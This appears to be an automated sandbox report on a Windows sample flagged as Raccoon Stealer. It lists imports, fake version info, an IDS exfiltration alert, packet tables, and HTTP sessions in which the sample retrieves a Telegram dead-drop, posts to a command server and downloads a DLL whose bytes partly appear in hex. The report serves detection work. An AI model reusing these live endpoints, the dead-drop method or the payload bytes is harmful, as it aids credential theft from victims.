KERNEL32.dll	SetUnhandledExceptionFilter, InitializeSListHead, HeapFree, CreateDirectoryW, SetHandleInformation, CancelWaitableTimer, LockFile, ConnectNamedPipe, FreeEnvironmentStringsA, GetTickCount, FindNextVolumeMountPointA, TzSpecificLocalTimeToSystemTime, GlobalAlloc, GetCalendarInfoA, SetSystemTimeAdjustment, GetConsoleAliasExesLengthW, GetFileAttributesA, HeapCreate, GetTimeFormatW, GetConsoleAliasW, SetSystemPowerState, TerminateProcess, GetAtomNameW, GetMailslotInfo, ReadFile, CreateJobObjectA, SystemTimeToTzSpecificLocalTime, GetConsoleOutputCP, IsDBCSLeadByteEx, GetCurrentDirectoryW, GetProcAddress, EnumDateFormatsExA, LocalLock, HeapUnlock, SetFileAttributesA, PrepareTape, GetProcessVersion, GetLocalTime, LoadLibraryA, UnhandledExceptionFilter, VirtualLock, FindAtomA, GetTapeParameters, GetModuleFileNameA, GetModuleHandleA, GetProcessShutdownParameters, LocalFileTimeToFileTime, CompareStringW, CompareStringA, GetTimeZoneInformation, GetProcessHeap, FlushFileBuffers, FreeLibrary, SetEndOfFile, LCMapStringA, RemoveVectoredExceptionHandler, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, GetCurrentProcess, IsDebuggerPresent, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, Sleep, HeapSize, ExitProcess, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, FatalAppExitA, HeapDestroy, VirtualFree, VirtualAlloc, WriteFile, GetStdHandle, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, SetConsoleCtrlHandler, InterlockedExchange, InitializeCriticalSectionAndSpinCount, CloseHandle, CreateFileA, SetStdHandle, WriteConsoleA, WriteConsoleW, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetLocaleInfoW, SetEnvironmentVariableA
USER32.dll	GetDesktopWindow, GetProcessDefaultLayout, GetClassLongA, GetUserObjectInformationA
ADVAPI32.dll	ImpersonateAnonymousToken, RegCreateKeyA, GetLengthSid

Version Infos

Description	Data
LegalCopyrighd	Jdfglsdffa
ProductVersa	7.0.25.71
InternalName	reaLatimad
FileVers	7.0.4.24
Translations	0x0169 0x0301

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Bolivia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/04/21-22:29:25.838086	TCP	2033974	ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt	49745	80	192.168.2.3	194.180.174.40

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2021 22:29:06.899162054 CET	49744	80	192.168.2.3	94.158.245.137
Dec 4, 2021 22:29:06.946136951 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:06.946263075 CET	49744	80	192.168.2.3	94.158.245.137
Dec 4, 2021 22:29:06.946742058 CET	49744	80	192.168.2.3	94.158.245.137
Dec 4, 2021 22:29:06.999279976 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:07.154874086 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:07.154930115 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:07.154967070 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:07.155005932 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:07.155035973 CET	80	49744	94.158.245.137	192.168.2.3
Dec 4, 2021 22:29:07.155067921 CET	49744	80	192.168.2.3	94.158.245.137
Dec 4, 2021 22:29:07.155129910 CET	49744	80	192.168.2.3	94.158.245.137
Dec 4, 2021 22:29:07.181932926 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.208153963 CET	49744	80	192.168.2.3	94.158.245.137
Dec 4, 2021 22:29:07.228501081 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.228599072 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.229038000 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.229110956 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.275433064 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.275471926 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649460077 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649615049 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649697065 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.649801970 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649858952 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649899960 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649921894 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.649939060 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649969101 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.649991989 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.650008917 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.650037050 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.650072098 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.672110081 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.718961000 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962471962 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962536097 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962577105 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962595940 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.962616920 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962656021 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962666035 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.962697029 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962735891 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962744951 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.962779045 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962817907 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962827921 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:07.962848902 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:07.962902069 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009361029 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009427071 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009468079 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009494066 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009507895 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009547949 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009562016 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009588957 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009627104 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009637117 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009666920 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009708881 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009717941 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009747028 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009790897 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009795904 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009830952 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009869099 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009882927 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009910107 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009948015 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.009963036 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.009989977 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.010031939 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.010041952 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.010071039 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.010111094 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.010119915 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.010149956 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.010200977 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.056873083 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.056942940 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.056983948 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057008028 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.057025909 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057066917 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057081938 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.057107925 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057148933 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057157040 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.057187080 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057226896 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057235003 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.057266951 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057305098 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057320118 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.057344913 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057384968 CET	80	49745	194.180.174.40	192.168.2.3
Dec 4, 2021 22:29:08.057404995 CET	49745	80	192.168.2.3	194.180.174.40
Dec 4, 2021 22:29:08.057424068 CET	80	49745	194.180.174.40	192.168.2.3

HTTP Request Dependency Graph

94.158.245.137

194.180.174.40

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	94.158.245.137	80	C:\Users\user\Desktop\4FGVZW19n7.exe

Timestamp	kBytes transferred	Direction	Data
Dec 4, 2021 22:29:06.946742058 CET	933	OUT	GET /duglassa1 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: 94.158.245.137
Dec 4, 2021 22:29:07.154874086 CET	934	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 04 Dec 2021 21:29:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: stel_ssid=c26d9b7232ffefbcae_2674412622159048665; expires=Sun, 05 Dec 2021 21:29:07 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store Strict-Transport-Security: max-age=35768000 Access-Control-Allow-Origin: * Data Raw: 31 31 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 75 67 6c 61 73 73 61 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 75 67 6c 61 73 73 61 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 32 36 30 34 63 77 68 76 43 71 7a 6d 33 57 48 36 57 69 2b 65 2b 2b 5a 53 33 71 36 34 33 39 6a 72 32 35 67 3d 3d 61 30 2d 76 33 63 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 75 67 6c 61 73 73 61 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 54 65 6c 65 67 72 61 6d 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 61 70 70 5f 73 74 6f 72 65 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 38 36 34 34 39 38 30 37 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 61 70 70 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 20 4d 65 73 73 65 6e 67 65 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 64 75 67 6c 61 73 73 61 31 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 61 6e 64 72 6f 69 64 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 64 75 67 6c 61 73 73 61 31 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c Data Ascii: 118a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @duglassa1</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="duglassa"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="2604cwhvCqzm3WH6Wi+e++ZS3q6439jr25g==a0-v3c"><meta property="twitter:title" content="duglassa"><meta property="twitter:image" content="https://telegram.org/img/t_logo.png"><meta property="twitter:site" content="@Telegram"><meta property="al:ios:app_store_id" content="686449807"><meta property="al:ios:app_name" content="Telegram Messenger"><meta property="al:ios:url" content="tg://resolve?domain=duglassa1"><meta property="al:android:url" content="tg://resolve?domain=duglassa1"><meta property="al

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49745	194.180.174.40	80	C:\Users\user\Desktop\4FGVZW19n7.exe

Timestamp	kBytes transferred	Direction	Data
Dec 4, 2021 22:29:07.229038000 CET	939	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 194.180.174.40
Dec 4, 2021 22:29:07.649460077 CET	940	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 04 Dec 2021 21:29:07 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 31 66 33 37 0d 0a 32 48 56 57 6d 37 55 4e 79 7a 71 78 42 79 50 62 66 37 6e 71 63 65 4e 59 65 37 6c 36 47 36 69 66 6e 4b 44 52 6b 43 4e 39 36 57 56 63 43 51 7a 32 43 58 30 57 44 64 77 59 64 41 6c 46 4b 35 44 77 71 72 70 6f 42 45 77 41 41 75 6b 4d 6d 6e 59 6d 4e 4b 54 49 31 68 6e 46 64 68 71 6c 4a 67 78 32 61 65 59 35 70 39 59 61 30 72 70 53 46 51 5a 4b 67 6f 31 79 50 44 33 2b 4d 73 45 37 7a 51 56 6c 54 31 6a 49 41 51 51 43 73 4c 41 6b 66 34 45 6d 34 58 79 77 35 69 74 66 76 4f 6a 6c 4f 31 4c 4d 50 79 7a 30 6e 44 79 47 68 6e 6e 65 37 64 6a 68 61 71 58 46 62 45 47 4a 2b 41 41 59 76 42 47 77 73 35 6f 56 55 54 41 6c 4e 45 32 6a 68 74 44 69 4e 30 33 4c 64 55 76 54 79 77 7a 78 79 71 76 30 63 2f 39 46 52 58 4e 58 32 4d 6d 76 56 64 56 70 33 66 50 58 35 2b 76 46 78 54 6f 46 37 50 6e 67 71 30 56 49 57 49 79 74 7a 4f 34 33 7a 2f 41 6a 75 47 58 47 30 74 68 4c 46 54 36 72 4e 62 30 32 6a 73 48 30 2f 70 4d 2f 6f 61 35 71 73 76 34 2b 71 68 49 4c 39 72 43 7a 5a 54 6c 6e 42 46 41 44 41 39 4a 43 75 31 67 67 48 35 34 72 57 76 46 67 64 66 78 67 67 4e 76 32 38 69 55 34 6d 46 49 37 4a 5a 53 49 5a 6c 6f 52 62 5a 46 77 53 37 52 6f 51 52 4f 44 58 67 59 33 49 69 64 2f 2f 33 73 30 32 46 4d 77 2f 73 64 6d 31 33 32 37 74 71 6d 2f 6a 63 79 74 38 78 32 4a 55 4e 35 76 35 42 6b 52 72 4d 4f 34 5a 33 51 41 76 34 4e 31 30 7a 68 49 62 54 76 77 37 56 45 44 71 48 62 70 51 5a 36 77 36 58 46 53 6c 55 6d 52 37 56 36 73 31 38 72 62 57 65 73 31 46 67 69 59 45 72 61 37 46 51 35 36 49 54 67 69 67 31 43 48 56 48 59 68 4b 6a 30 31 56 69 6e 42 4c 35 5a 4f 31 33 4e 4d 48 4e 34 61 37 38 49 64 77 51 4f 5a 64 45 36 4d 53 5a 38 41 48 70 6a 44 38 46 31 4e 4e 46 61 77 4a 33 78 45 56 46 43 56 58 70 53 32 64 35 62 54 4f 6f 76 4e 76 52 4e 66 4c 46 52 67 47 5a 6a 6b 69 4f 4f 75 6b 49 4a 51 7a 75 37 59 5a 6c 2b 54 70 34 57 78 70 68 56 51 48 53 31 67 5a 41 76 4b 61 4f 55 65 30 46 53 64 61 53 4f 6c 48 55 79 61 42 71 78 46 4a 4d 57 47 78 43 48 35 33 36 52 75 37 71 44 64 2f 63 4c 35 72 4a 74 42 59 49 6d 69 69 4e 45 65 59 71 43 42 30 4d 4e 42 32 6a 54 46 64 6a 79 52 30 7a 50 63 52 54 2f 62 77 44 53 2f 49 57 70 51 6e 63 5a 66 33 34 69 65 78 62 68 5a 50 71 4f 55 59 53 7a 4b 79 44 66 4c 37 74 43 2f 4c 35 4a 42 72 51 42 2b 32 32 64 77 4f 4d 46 56 61 57 6a 4d 74 2f 2b 41 76 31 5a 45 59 79 30 51 31 72 49 54 4c 32 58 53 64 45 35 30 64 49 2b 75 74 39 71 36 36 4b 77 36 2f 73 47 6a 46 35 56 35 49 2f 6a 56 33 65 37 6a 54 45 35 64 51 2b 71 41 6e 57 73 51 72 68 2f 36 35 67 2f 6a 49 45 42 73 42 51 57 59 58 49 38 63 41 6d 36 35 61 68 30 75 38 50 50 6e 36 59 67 75 41 41 67 32 6d 31 57 72 50 63 6f 43 2f 56 69 59 72 44 51 72 65 44 4b 53 34 46 75 6b 34 74 4c 32 64 6e 4e 57 77 74 65 34 70 62 67 47 39 79 31 78 49 7a 70 54 4f 4b 56 34 46 78 6e 73 67 75 4f 73 4f 6a 61 71 7a 74 42 5a 4c 69 61 2b 74 55 4c 63 57 50 4c 76 4d 48 76 6d 38 30 47 49 61 6b 31 76 70 4a 2f 67 75 34 78 71 2b 33 4d 6e 48 69 6c 4a 72 36 35 77 52 6e 63 7a 67 38 32 37 46 4c 7a 66 44 30 53 72 6c 41 76 48 63 65 56 64 32 65 35 77 78 73 64 65 2f 50 41 34 32 69 62 47 57 72 48 6e 67 6f 31 68 32 67 70 6b 48 58 63 6f 70 65 72 6e 32 30 76 77 4d 61 71 76 6a 68 52 6b 4a 44 64 39 59 47 6f 42 68 35 74 72 65 77 43 4b 77 6d 2b 32 2f 61 70 53 68 38 79 48 67 42 49 6b 65 68 42 37 62 62 35 64 73 76 50 41 30 46 61 6f 65 51 78 77 49 4b 32 6d 36 45 38 6a 55 63 4d 50 38 50 59 46 49 55 52 31 44 54 68 43 70 49 35 68 4f 35 45 42 66 67 53 65 79 4a Data Ascii: 1f372HVWm7UNyzqxByPbf7nqceNYe7l6G6ifnKDRkCN96WVcCQz2CX0WDdwYdAlFK5DwqrpoBEwAAukMmnYmNKTI1hnFdhqlJgx2aeY5p9Ya0rpSFQZKgo1yPD3+MsE7zQVlT1jIAQQCsLAkf4Em4Xyw5itfvOjlO1LMPyz0nDyGhnne7djhaqXFbEGJ+AAYvBGws5oVUTAlNE2jhtDiN03LdUvTywzxyqv0c/9FRXNX2MmvVdVp3fPX5+vFxToF7Pngq0VIWIytzO43z/AjuGXG0thLFT6rNb02jsH0/pM/oa5qsv4+qhIL9rCzZTlnBFADA9JCu1ggH54rWvFgdfxggNv28iU4mFI7JZSIZloRbZFwS7RoQRODXgY3Iid//3s02FMw/sdm1327tqm/jcyt8x2JUN5v5BkRrMO4Z3QAv4N10zhIbTvw7VEDqHbpQZ6w6XFSlUmR7V6s18rbWes1FgiYEra7FQ56ITgig1CHVHYhKj01VinBL5ZO13NMHN4a78IdwQOZdE6MSZ8AHpjD8F1NNFawJ3xEVFCVXpS2d5bTOovNvRNfLFRgGZjkiOOukIJQzu7YZl+Tp4WxphVQHS1gZAvKaOUe0FSdaSOlHUyaBqxFJMWGxCH536Ru7qDd/cL5rJtBYImiiNEeYqCB0MNB2jTFdjyR0zPcRT/bwDS/IWpQncZf34iexbhZPqOUYSzKyDfL7tC/L5JBrQB+22dwOMFVaWjMt/+Av1ZEYy0Q1rITL2XSdE50dI+ut9q66Kw6/sGjF5V5I/jV3e7jTE5dQ+qAnWsQrh/65g/jIEBsBQWYXI8cAm65ah0u8PPn6YguAAg2m1WrPcoC/ViYrDQreDKS4Fuk4tL2dnNWwte4pbgG9y1xIzpTOKV4FxnsguOsOjaqztBZLia+tULcWPLvMHvm80GIak1vpJ/gu4xq+3MnHilJr65wRnczg827FLzfD0SrlAvHceVd2e5wxsde/PA42ibGWrHngo1h2gpkHXcopern20vwMaqvjhRkJDd9YGoBh5trewCKwm+2/apSh8yHgBIkehB7bb5dsvPA0FaoeQxwIK2m6E8jUcMP8PYFIUR1DThCpI5hO5EBfgSeyJ
Dec 4, 2021 22:29:07.672110081 CET	949	OUT	GET //l/f/EqqPhH0B3dP17Spz-q0u/13167c5f54fcce8683665e37815363c28e6e2bbe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 194.180.174.40
Dec 4, 2021 22:29:07.962471962 CET	951	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 04 Dec 2021 21:29:07 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Sun, 14 Nov 2021 14:06:13 GMT ETag: "619117d5-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 